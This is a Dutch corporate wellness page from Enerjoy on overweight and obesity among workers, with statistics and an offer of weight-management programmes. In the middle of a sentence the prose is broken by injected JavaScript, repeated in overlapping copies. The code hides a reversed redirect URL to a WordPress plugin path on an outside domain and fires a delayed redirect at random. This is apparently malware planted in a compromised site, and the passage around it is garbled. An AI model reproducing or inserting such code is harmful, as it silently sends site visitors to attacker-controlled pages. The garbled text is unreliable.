Duurzame inzetbaarheid & overgewicht

Duurzame inzetbaarheid overgewicht - EnerjoyGezond eetgedrag en gezond gewicht krijgen bij het verbeteren van duurzame inzetbaarheid nog dikwijls onvoldoende aandacht. Alhoewel de cijfers een duidelijke taal spreken. Maar liefst 45% van de beroepsbevolking overgewicht heeft en 12% obesitas [1].
Deze situatie heeft gevolgen voor zowel werknemer als werkgever. Overgewicht – en in nog sterkere mate obesitas- verhoogt de kans op gezondheidsproblemen, bedrijfsongevallen en productiviteitsverlies. Wat begint met verminderde energie en productiviteit kan zich uitmonden in ernstige aandoeningen met langdurig ziekteverzuim als gevolg. Het is dus van essentieel belang om deze leefstijl­problemen aan te pakken en van overgewicht en ongezond eetgedrag een prioriteit te maken.

Vitaal werken zonder overgewicht

Als werkgever heeft u grote invloed op de gezondheid van uw werknemers, ze brengen immers de meeste tijd van hun wakkere uren bij u op kantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toor door. Met het aanbieden en doorvoeren van de juiste instrumenten en interventies kunt u uw personeel motiveren gezonder te eten en te leven. U creëert win-win situatie door uw medewerkers te begeleiden bij het afvallen en aanleren van gezonde eetgewoonten.

Duurzame inzetbaarheid & overgewicht

Enerjoy begrijpt dat gezonde werknemers cruciaal zijn voor een winstgevende organisatie. Door middel van advies, begeleiding en leuke doeltreffende activiteiten implementeren wij een gezonde levensstijl binnen uw bedrijf.
Wilt u overgewicht binnen uw organisatie terugdringen en aandacht schenken aan gezonde eetgewoonten? Wij helpen u graag bij het creëren van een langdurig gezonde organisatie. Denk hierbij aan gewichtsbeheersingsprogramma’s, voorlichtingscampagnes, interactieve workshops en trainingen. Bekijk ons aanbod:

[ess_grid alias=”overgewicht”]

Bronnen

  1. Nationaal Kompas Volksgezondheid. (2014, 23 juni). Hoeveel mensen hebben overgewicht? Geraadpleegd op 11 maart 2015, van http://www.nationaalkompas.nl/gezondheidsdeterminanten/persoonsgebonden/overgewicht/hoeveel-mensen-hebben-overgewicht/